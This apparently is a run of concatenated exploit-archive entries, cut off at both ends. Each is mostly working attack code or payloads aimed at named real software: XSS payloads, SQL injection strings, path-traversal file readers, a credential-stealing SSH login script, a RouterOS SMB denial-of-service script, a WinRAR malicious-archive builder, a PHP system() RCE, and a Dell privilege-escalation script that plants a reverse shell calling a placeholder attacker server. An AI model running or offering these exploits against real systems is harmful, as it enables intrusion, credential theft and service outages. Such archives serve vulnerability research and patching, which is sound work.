╚══╝╚══╝ ╚═╝ ╚═╝ ╚══════╝ ╚═════╝╚═╝ ╚═╝╚═╝╚═╝ ╚═╝ ╚══════╝ {Style.RESET_ALL} """ print(ascii_art) parser = argparse.ArgumentParser(description="AutoPwn Script for Bizness HTB machine", usage= "sudo Nagios.py <Target IP> <LHOST> <LPORT>") parser.add_argument('IP' ,help= "Target IP ") parser.add_argument('LHOST',help= "Local host") parser.add_argument('LPORT' ,help= "Listening Port") args = parser.parse_args() min_required_args = 3 if len(vars(args)) != min_required_args: parser.print_usage() exit() adminUsername, adminPassword = createAdmin(args.IP, sqlmap(args.IP,input(f"{Fore.MAGENTA}[+] Please insert a non-administrative username: "),input(f"{Fore.MAGENTA}[+] Please insert the password: "))) print(f"{Fore.MAGENTA}[+] Admin Username=" + adminUsername) print(f"{Fore.MAGENTA}[+] Admin Password=" + adminPassword) adminExploit(adminUsername, adminPassword, args.IP,args.LHOST,args.LPORT)

# Exploit Title: Stored Cross-Site Scripting (XSS) in LimeSurvey Community Edition Version 5.3.32+220817 # Exploit Author: Subhankar Singh # Date: 2024-02-03 # Vendor: LimeSurvey # Software Link: https://community.limesurvey.org/releases/ # Version: LimeSurvey Community Edition Version 5.3.32+220817 # Tested on: Windows (Client) # CVE: CVE-2024-24506 ## Description: A critical security vulnerability exists in LimeSurvey Community Edition Version 5.3.32+220817, particularly in the "General Setting" functionality's "Administrator email address:" field. This allows an attacker to compromise the super-admin account, leading to potential theft of cookies and session tokens. ## Background: Cross-site scripting (XSS) is a common web security vulnerability that compromises user interactions with a vulnerable application. Stored XSS occurs when user input is stored in the application and executed whenever a user triggers or visits the page. ## Issue: LimeSurvey fails to properly validate user-supplied input on both client and server sides, despite some protective measures. The "Administrator email address:" field within the "General Setting" functionality permits the insertion of special characters, enabling the injection of malicious JavaScript payloads. These payloads are stored in the database and executed when the user saves or reloads the page. ## Steps To Reproduce: 1. Log into the LimeSurvey application. 2. Navigate to the general settings. 3. Insert the following JavaScript payload in the "Administrator email address:" field: Payload: `[email protected]"><u>s</u><svg onload=confirm(document.domain)>` ## Expected Result: The LimeSurvey application should display an alert with the domain after clicking save and reloading the page. ## Actual Result: The LimeSurvey application is vulnerable to Stored Cross-Site Scripting, as evidenced by the successful execution of the injected payload. ## Proof of Concept: Attached Screenshots for the reference.

# Exploit Title: Asterisk AMI - Partial File Content & Path Disclosure (Authenticated) # Date: 2023-03-26 # Exploit Author: Sean Pesce # Vendor Homepage: https://asterisk.org/ # Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/ # Version: 18.20.0 # Tested on: Debian Linux # CVE: CVE-2023-49294 #!/usr/bin/env python3 # # Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that # facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of # file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar # to the common INI configuration format. # # References: # https://nvd.nist.gov/vuln/detail/CVE-2023-49294 # https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f # https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/ import argparse import getpass import socket import sys CVE_ID = 'CVE-2023-49294' DEFAULT_PORT = 5038 DEFAULT_FILE = '/etc/hosts' DEFAULT_ACTION_ID = 0 DEFAULT_TCP_READ_SZ = 1048576 # 1MB def ami_msg(action, args, encoding='utf8'): assert type(action) == str, f'Invalid type for AMI Action (expected string): {type(action)}' assert type(args) == dict, f'Invalid type for AMI arguments (expected dict): {type(args)}' if 'ActionID' not in args: args['ActionID'] = 0 line_sep = '\r\n' data = f'Action: {action}{line_sep}' for a in args: data += f'{a}: {args[a]}{line_sep}' data += line_sep return data.encode(encoding) def tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ): assert type(data) in (bytes, bytearray, memoryview), f'Invalid data type (expected bytes): {type(data)}' sock.sendall(data) resp = b'' while not resp.endswith(b'\r\n\r\n'): resp += sock.recv(read_sz) return resp if __name__ == '__main__': # Parse command-line arguments argparser = argparse.ArgumentParser() argparser.add_argument('host', type=str, help='The host name or IP address of the Asterisk AMI server') argparser.add_argument('-p', '--port', type=int, help=f'Asterisk AMI TCP port (default: {DEFAULT_PORT})', default=DEFAULT_PORT) argparser.add_argument('-u', '--user', type=str, help=f'Asterisk AMI user', required=True) argparser.add_argument('-P', '--password', type=str, help=f'Asterisk AMI secret', default=None) argparser.add_argument('-f', '--file', type=str, help=f'File to read (default: {DEFAULT_FILE})', default=DEFAULT_FILE) argparser.add_argument('-a', '--action-id', type=int, help=f'Action ID (default: {DEFAULT_ACTION_ID})', default=DEFAULT_ACTION_ID) if '-h' in sys.argv or '--help' in sys.argv: print(f'Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\n', file=sys.stderr) argparser.print_help() sys.exit(0) args = argparser.parse_args() # Validate command-line arguments assert 1 <= args.port <= 65535, f'Invalid port number: {args.port}' args.host = socket.gethostbyname(args.host) if args.password is None: args.password = getpass.getpass(f'[PROMPT] Enter the AMI password for {args.user}: ') print(f'[INFO] Proof of concept exploit for {CVE_ID}', file=sys.stderr) print(f'[INFO] Connecting to Asterisk AMI: {args.user}@{args.host}:{args.port}', file=sys.stderr) # Connect to the Asterisk AMI server sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.connect((args.host, args.port)) # Read server banner banner = sock.recv(DEFAULT_TCP_READ_SZ) print(f'[INFO] Connected to {banner.decode("utf8").strip()}', file=sys.stderr) # Authenticate to the Asterisk AMI server login_msg = ami_msg('Login', {'Username':args.user,'Secret':args.password}) login_resp = tcp_send_rcv(sock, login_msg) while b'Authentication' not in login_resp: login_resp = tcp_send_rcv(sock, b'') if b'Authentication accepted' not in login_resp: print(f'\n[ERROR] Invalid credentials: \n{login_resp.decode("utf8")}', file=sys.stderr) sys.exit(1) #print(f'[INFO] Authenticated: {login_resp.decode("utf8")}', file=sys.stderr) print(f'[INFO] Login success', file=sys.stderr) # Obtain file data via path traversal traversal = '../../../../../../../../' cfg_msg = ami_msg('GetConfig', { 'ActionID': args.action_id, 'Filename': f'{traversal}{args.file}', #'Category': 'default', #'Filter': 'name_regex=value_regex,', }) resp = tcp_send_rcv(sock, cfg_msg) while b'Response' not in resp: resp = tcp_send_rcv(sock, b'') print(f'', file=sys.stderr) print(f'{resp.decode("utf8")}') if b'Error' in resp: sys.exit(1) pass # Done

# Exploit Title: Workout Journal App 1.0 - Stored XSS # Date: 12.01.2024 # Exploit Author: MURAT CAGRI ALIS # Vendor Homepage: https://www.sourcecodester.com<https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html> # Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Windows / MacOS / Linux # CVE : CVE-2024-24050 # Description Install and run the source code of the application on localhost. Register from the registration page at the url workout-journal/index.php. When registering, stored XSS payloads can be entered for the First and Last name on the page. When registering on this page, for the first_name parameter in the request to the /workout-journal/endpoint/add-user.php url For the last_name parameter, type " <script>console.log(document.cookie)</script> " and " <script>console.log(1337) </script> ". Then when you log in you will be redirected to /workout-journal/home.php. When you open the console here, you can see that Stored XSS is working. You can also see from the source code of the page that the payloads are working correctly. This vulnerability occurs when a user enters data without validation and then the browser is allowed to execute this code. # PoC Register Request to /workout-journal/endpoints/add-user.php POST /workout-journal/endpoint/add-user.php HTTP/1.1 Host: localhost Content-Length: 268 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/workout-journal/index.php Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=64s63vgqlnltujsrj64c5o0vci Connection: close first_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E%29&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E%29&weight=85&height=190&birthday=1991-11-20&contact_number=1234567890&email=test%40mail.mail&username=testusername&password=Test123456- This request turn back 200 Code on Response HTTP/1.1 200 OK Date: Sat, 16 Mar 2024 02:05:52 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4 X-Powered-By: PHP/8.1.4 Content-Length: 214 Connection: close Content-Type: text/html; charset=UTF-8 <script> alert('Account Registered Successfully!'); window.location.href = 'http://localhost/workout-journal/'; </script> After these all, you can go to login page and login to system with username and password. After that you can see that on console payloads had worked right. /workout-journal/home.php Request GET /workout-journal/home.php HTTP/1.1 Host: localhost sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: http://localhost/workout-journal/endpoint/login.php Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=co1vmea8hr1nctjvmid87fa7d1 Connection: close /workout-journal/home.php Response HTTP/1.1 200 OK Date: Sat, 16 Mar 2024 02:07:56 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4 X-Powered-By: PHP/8.1.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 2791 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Workout Journal App</title> <!-- Style CSS --> <link rel="stylesheet" href="./assets/style.css"> <!-- Bootstrap CSS --> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css"> <style> body { overflow: hidden; } </style> </head> <body> <div class="main"> <nav class="navbar navbar-expand-lg navbar-dark bg-dark"> <a class="navbar-brand ml-3" href="#">Workout Journal App</a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarSupportedContent"> <ul class="navbar-nav ml-auto"> <li class="nav-item active"> <a class="nav-link" href="./endpoint/logout.php">Log Out</a> </li> </div> </nav> <div class="landing-page-container"> <div class="heading-container"> <h2>Welcome <script>console.log(document.cookie);</script>) <script>console.log(1337);</script>)</h2> <p>What would you like to do today?</p> </div> <div class="select-option"> <div class="read-journal" onclick="redirectToReadJournal()"> <img src="./assets/read.jpg" alt=""> <p>Read your past workout journals.</p> </div> <div class="write-journal" onclick="redirectToWriteJournal()"> <img src="./assets/write.jpg" alt=""> <p>Write your todays journal.</p> </div> </div> </div> </div> <!-- Bootstrap JS --> <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/jquery.slim.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/umd/popper.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.min.js"></script> <!-- Script JS --> <script src="./assets/script.js"></script> </body> </html>

# Exploit Title: Purei CMS 1.0 - SQL Injection # Date: [27-03-2024] # Exploit Author: [Number 7] # Vendor Homepage: [purei.com] # Version: [1.0] # Tested on: [Linux] ____________________________________________________________________________________ Introduction: An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation of user input. Such an injection transpires when web applications accept user input directly inserted into an SQL statement without effectively filtering out hazardous characters. This could jeopardize the integrity of your database or reveal sensitive information. ____________________________________________________________________________________ Time-Based Blind SQL Injection: Vulnerable files: http://localhost/includes/getAllParks.php http://localhost/includes/getSearchMap.php make a POST request with the value of the am input set to : if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ make sure to url encode the inputs. SQL injection: Method: POST REQUEST Vunerable file: /includes/events-ajax.php?action=getMonth data for the POST req: month=3&type=&year=2024&cal_id=1[Inject Here]

Exploit Title: Broken Access Control - on NodeBB v3.6.7 Date: 22/2/2024 Exploit Author: Vibhor Sharma Vendor Homepage: https://nodebb.org/ Version: 3.6.7 Description: I identified a broken access control vulnerability in nodeBB v3.6.7, enabling attackers to access restricted information intended solely for administrators. Specifically, this data is accessible only to admins and not regular users. Through testing, I discovered that when a user accesses the group section of the application and intercepts the response for the corresponding request, certain attributes are provided in the JSON response. By manipulating these attributes, a user can gain access to tabs restricted to administrators. Upon reporting this issue, it was duly acknowledged and promptly resolved by the developers. Steps To Reproduce: 1) User with the least previlages needs to neviagte to the group section. 2) Intercept the response for the group requets. 3) In the response modify the certian paramters : " *"system":0,"private":0,"isMember":true,"isPending":true,"isInvited":true,"isOwner":true,"isAdmin":true, **" *". 4) Forward the request and we can see that attacker can access the restricted information. *Impact:* Attacker was able to access the restricted tabs for the Admin group which are only allowed the the administrators.

# Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure # Date: 28-02-2024 # Exploit Author: semaja2 # Vendor Homepage: https://siklu.com/ # Software Link: https://partners.siklu.com/home/frontdoor # Version: < 2.0.0 # Tested on: 2.0.0 # CVE : None assigned # # Instructions # 1. Perform IPv6 host detect by pinging all host multicast address for interface attached to device # `ping6 -I en7 -c 2 ff02::1` # 2. Review IPv6 neighbours and identify target device based on vendor component of MAC address # `ip -6 neigh show dev en7` # 3. Execute script # `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7` # 4. Enjoy the access import socket import sys import os address = str(sys.argv[1]) # the target port = 12777 # Captured command, sends "GetCredentials" to obtain random generated username/password cmd = bytearray.fromhex("000000290FFF000100000001000100000000800100010000000E47657443726564656E7469616C730000000000") addrinfo = socket.getaddrinfo(address, port, socket.AF_INET6, socket.SOCK_STREAM) (family, socktype, proto, canonname, sockaddr) = addrinfo[0] s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) s.connect(sockaddr) s.send(cmd) data = s.recv(200) s.close() output = "".join(map(chr, data)) # Split output, then remove trailing noise as string length is always 35 splits = output.split('#') username = splits[1][slice(0, 35, 1)] password = splits[2][slice(0, 35, 1)] print('Username: ', username) print('Password: ', password) os.system("sshpass -p {password} ssh -o StrictHostKeychecking=no {address} -l {username}".format(address = address, username = username, password = password))

# Exploit Title: CVE-2024-27686: RouterOS-SMB-DOS # Google Dork: N/A # Date: 03/04/2024 # Exploit Author: ice-wzl, Solstice Cyber Solutions # Vendor Homepage: https://mikrotik.com/ # Software Link: https://mikrotik.com/download/archive # Version: RouterOS devices ranging from 6.40.5 - 6.44 and 6.48.1 - 6.49.10 # Tested on: RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10 # CVE : CVE-2024-27686 #!/usr/bin/python3 # Founded by ice-wzl in conjunction with Solstice Cyber Solutions import argparse import sys import socket # Define the packets # the packet that causes crash 6.40.5 - 6.42.3 fuzzed_packet_6 = b'\x00\x00\x00n\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x03\x00\xf1\x1f\x08\x00\x00\x00\x00\x00\x00\xe1\xbe\x82\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00G\xe5\x07\xf5\x07\xec\x01u\xe4Q]\x9e\xea\xedn\xa9\t\x00\x00\x00H\x00&\x00\\\x00\\\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x005\x00.\x007\x007\x00\\\x00p\x00u\x00b\x00' packet_0 = b'\x00\x00\x00\xea\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x05\x00\x01\x00\x00\x00\x7f\x00\x00\x00\xe8\xe4*\x99\xc9\xeb\xb6E\xa2A\xe9(\xee%\xe5\xdfp\x00\x00\x00\x04\x00\x00\x00\x02\x02\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00_\xf7m\xf2h*\x8f\x8ae\x0f8+T=Na8_\x0b@C\x82\xe7\x87\xc3qZ\xd7\xcf0M\x87\x00\x00\x02\x00\n\x00\x00\x00\x00\x00\x04\x00\x02\x00\x01\x00\x04\x00\x03\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x00\x00\x03\x00\x02\x00\x01\x00\x00\x00\x05\x00\x1a\x00\x00\x00\x00\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x005\x00.\x008\x004\x00' packet_2_fuzzed = b'\x00\x00\x00\xa2\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00X\x00J\x00\x00\x00\x00\x00\x00\x00\x00\x00`H\x05\x06+\x06\x01\x05\x05\x02\xa0>0<\xa0\x0e21540373\xed\xba\xad211\x0c\x06\n+\x06\x01\x04\x01\x82294517887446830\x02\x02\n\xa2*\x04(NTLMSSP\x00\x01\x00\x00\x00\x15\x82\x08b\x00\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x06\x01\x00\x00\x00\x00\x00\x0f' def open_connection(ip, port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip, port)) return s except ConnectionRefusedError: print(f"[!] Connection Refused on: {ip} {port}") sys.exit(2) def send_payload_high(s): s.send(packet_0) s.send(packet_2_fuzzed) s.close() def send_payload_low(s): s.send(fuzzed_packet_6) s.close() def verify_input(user_inp): try: user_inp = int(user_inp) if user_inp > 2 or user_inp < 1: return 3 else: return user_inp except ValueError: return 0 if __name__ == '__main__': parser = argparse.ArgumentParser(prog='SMB Crash', description='Crashes Mikrotik RouterOS SMB Service 6.40.5 - 6.49.10', epilog='Discovered by: ice-wzl') parser.add_argument("-t", "--target", action="store", dest="target") parser.add_argument("-p", "--port", action="store", dest="port") args = parser.parse_args() if not args.target or not args.port: print(f"[+] python3 {sys.argv[0]} --help") sys.exit(1) print("[+] What version is the target:\n\t[1] 6.40.5 - 6.44\n\t[2] 6.48.1 - 6.49.10\nEnter 1 or 2:") version_choice = input("--> ") if verify_input(version_choice) == 0: print("Please enter a number...") sys.exit(3) elif verify_input(version_choice) == 3: print("Please enter a number between 1 and 2") sys.exit(4) if verify_input(version_choice) == 1: if args.port: get_connect = open_connection(args.target, int(args.port)) send_payload_low(get_connect) print(f"[+] Sent DOS to {args.target} on {args.port}") else: get_connect = open_connection(args.target, 445) send_payload_low(get_connect) print(f"[+] Sent DOS to {args.target} on 445") if verify_input(version_choice) == 2: if args.port: get_connect = open_connection(args.target, int(args.port)) send_payload_high(get_connect) print(f"[+] Sent DOS to {args.target} on {args.port}") else: get_connect = open_connection(args.target, 445) send_payload_high(get_connect) print(f"[+] Sent DOS to {args.target} on 445")

# Exploit Title: [title] Dell Security Management Server versions prior to 11.9.0 # Exploit Author: [author] Amirhossein Bahramizadeh # CVE : [if applicable] CVE-2023-32479 Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell Security Management Server versions prior to 11.9.0 contain privilege escalation vulnerability due to improper ACL of the non-default installation directory. A local malicious user could potentially exploit this vulnerability by replacing binaries in installed directory and taking the reverse shell of the system leading to Privilege Escalation. #!/bin/bash INSTALL_DIR="/opt/dell" # Check if the installed directory has improper ACLs if [ -w "$INSTALL_DIR" ]; then # Replace a binary in the installed directory with a malicious binary that opens a reverse shell echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit" echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit" chmod +x "$INSTALL_DIR/dell-exploit" # Wait for the reverse shell to connect to your malicious server nc -lvnp 1234 fi

################################################################################################ # Exploit Title : EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831 # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Security Risk : High # # # # Description : All target's GOV & Military websites # # # ################################################################################################ # # # Expl0iTs: # #include <stdio.h> #include <stdlib.h> #include <string.h> #include "zip.h" #define PDF_FILE "document.pdf" #define FOLDER_NAME "document.pdf\\" #define SCRIPT_FILE "script.bat" #define ZIP_FILE "exploit.zip" int main(void) { zipFile zf = zipOpen(ZIP_FILE, APPEND_STATUS_CREATE); if (zf == NULL) { printf("Error opening ZIP file\n"); return -1; } zip_fileinfo zfi; memset(&zfi, 0, sizeof(zfi)); if (zipOpenNewFileInZip(zf, PDF_FILE, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) { printf("Error adding PDF file to ZIP file\n"); zipClose(zf, NULL); return -1; } FILE *fp = fopen(PDF_FILE, "rb"); if (fp == NULL) { printf("Error opening PDF file\n"); zipCloseFileInZip(zf); zipClose(zf, NULL); return -1; } char buffer[1024]; int bytes_read; while ((bytes_read = fread(buffer, 1, sizeof(buffer), fp)) > 0) { if (zipWriteInFileInZip(zf, buffer, bytes_read) < 0) { printf("Error writing PDF file to ZIP file\n"); fclose(fp); zipCloseFileInZip(zf); zipClose(zf, NULL); return -1; } } fclose(fp); zipCloseFileInZip(zf); if (zipOpenNewFileInZip(zf, FOLDER_NAME, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) { printf("Error adding folder to ZIP file\n"); zipClose(zf, NULL); return -1; } zipCloseFileInZip(zf); char script_name[256]; sprintf(script_name, "%s%s", FOLDER_NAME, SCRIPT_FILE); if (zipOpenNewFileInZip(zf, script_name, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) { printf("Error adding script file to ZIP file\n"); zipClose(zf, NULL); return -1; } char script_content[] = "@echo off\nstart cmd /c \"echo You have been exploited by CVE-2023-38831 && pause\"\n"; if (zipWriteInFileInZip(zf, script_content, strlen(script_content)) < 0) { printf("Error writing script file to ZIP file\n"); zipCloseFileInZip(zf); zipClose(zf, NULL); return -1; } zipCloseFileInZip(zf); zipClose(zf, NULL); printf("ZIP file created successfully\n"); return 0; } https://nvd.nist.gov/vuln/detail/CVE-2023-38831 https://nvd.nist.gov/vuln/detail/CVE-2023-38831 https://github.com/HDCE-inc/CVE-2023-38831 https://www.cvedetails.com/cve/CVE-2023-38831/ https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/ https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/CVE-2023-38831 http://packetstormsecurity.com/files/174573/WinRAR-Remote-Code-Execution.html https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/ https://news.ycombinator.com/item?id=37236100 https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/ https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/ https://hdce.medium.com/cve-2023-38831-winrar-zero-day-poses-new-risks-for-traders-684911befad2

# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal # Date: 2024-03-06 # Exploit Author: Ven3xy # Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip # Version: 2.7.10 # Tested on: Linux import sys import requests from urllib.parse import urljoin import time def exploit(target_url, file_name, depth): traversal = '../' * depth exploit_url = urljoin(target_url, '/wp-admin/tools.php') params = { 'page': 'backup_manager', 'download_backup_file': f'{traversal}{file_name}' } response = requests.get(exploit_url, params=params) if response.status_code == 200 and response.headers.get('Content-Disposition') \ and 'attachment; filename' in response.headers['Content-Disposition'] \ and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0: print(response.text) # Replace with the desired action for the downloaded content file_path = f'simplebackup_{file_name}' with open(file_path, 'wb') as file: file.write(response.content) print(f'File saved in: {file_path}') else: print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.") if __name__ == "__main__": if len(sys.argv) != 4: print("Usage: python exploit.py <target_url> <file_name> <depth>") sys.exit(1) target_url = sys.argv[1] file_name = sys.argv[2] depth = int(sys.argv[3]) print("\n[+] Exploit Coded By - Venexy || Simple Backup Plugin 2.7.10 EXPLOIT\n\n") time.sleep(5) exploit(target_url, file_name, depth)

## Exploit Title: liveSite Version : 2019.1 Campaigns Remote Code Execution ### Date: 2024-1-9 ### Exploit Author: tmrswrr ### Category: Webapps ### Vendor Homepage: https://livesite.com/ ### Version : 2019.1 ### Tested on: https://www.softaculous.com/apps/cms/liveSite 1 ) Login with admin cred Click Campaigns > Create Campaign > Choose format Plain Text , write in body your payload : https://127.0.0.1/liveSite/livesite/add_email_campaign.php Payload : <?php echo system('cat /etc/passwd'); ?> 2 ) After save you will be see result : Result: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash pinguzo:x:992:992::/etc/pinguzo:/bin/false webuzo:x:987:987::/home/webuzo:/bin/bash apache:x:986:985::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false

# Exploit Title: Online Hotel Booking In PHP 1.0 - Blind SQL Injection (Unauthenticated) # Google Dork: n/a # Date: 04/02/2024 # Exploit Author: Gian Paris C. Agsam # Vendor Homepage: https://github.com/projectworldsofficial # Software Link: https://projectworlds.in/wp-content/uploads/2019/06/hotel-booking.zip # Version: 1.0 # Tested on: Apache/2.4.58 (Debian) / PHP 8.2.12 # CVE : n/a import requests import argparse from colorama import (Fore as F, Back as B, Style as S) BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB,FW = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT,F.WHITE requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} parser = argparse.ArgumentParser(description='Exploit Blind SQL Injection') parser.add_argument('-u', '--url', help='') args = parser.parse_args() def banner(): print(f"""{FR} ·▄▄▄·▄▄▄.▄▄ · ▄▄▄ . ▄▄· ·▄▄▄▄ ▄▄▄ ▪ ·▄▄▄▄ ▪ ▐▄▄·▐▄▄·▐█ ▀. ▀▄.▀·▐█ ▌▪██▪ ██ ▀▄ █·▪ ██ ██▪ ██ ▄█▀▄ ██▪ ██▪ ▄▀▀▀█▄▐▀▀▪▄██ ▄▄▐█· ▐█▌▐▀▀▄ ▄█▀▄ ▐█·▐█· ▐█▌ 